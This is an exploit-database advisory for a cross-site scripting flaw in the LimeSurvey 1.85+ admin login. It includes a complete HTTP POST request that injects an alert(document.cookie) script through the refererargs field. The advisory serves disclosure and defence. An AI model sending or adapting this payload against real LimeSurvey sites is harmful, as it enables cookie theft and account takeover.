LimeSurvey Cross-Site Scripting Vulnerability

vendor:

LimeSurvey

by:

Unknown

7.5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: LimeSurvey

Affected Version From: 1.85+

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:limesurvey:limesurvey

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

LimeSurvey Cross-Site Scripting Vulnerability

The LimeSurvey application fails to properly sanitize user-supplied data, allowing an attacker to execute arbitrary script code in the browser of a victim user. This can lead to the theft of authentication credentials and other malicious actions.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and implement proper output encoding to prevent script injection attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47931/info

LimeSurvey is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

LimeSurvey 1.85+ is vulnerable; other versions may also be affected.

POST /admin/admin.php HTTP/1.1
Content-Length: 110
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif,
image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.mspowerpoint,
application/msword, application/x-shockwave-flash, */*
Referer: http://xxx.xxx.xxx.xxx/admin/admin.php
Accept-Language: es-AR
Content-Type: application/x-www-form-urlencoded
Host: xxx.xxx.xxx.xxx
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
user=admin&password=test&loginlang=default&action=login&refererargs="/><script
>alert(document.cookie)</script>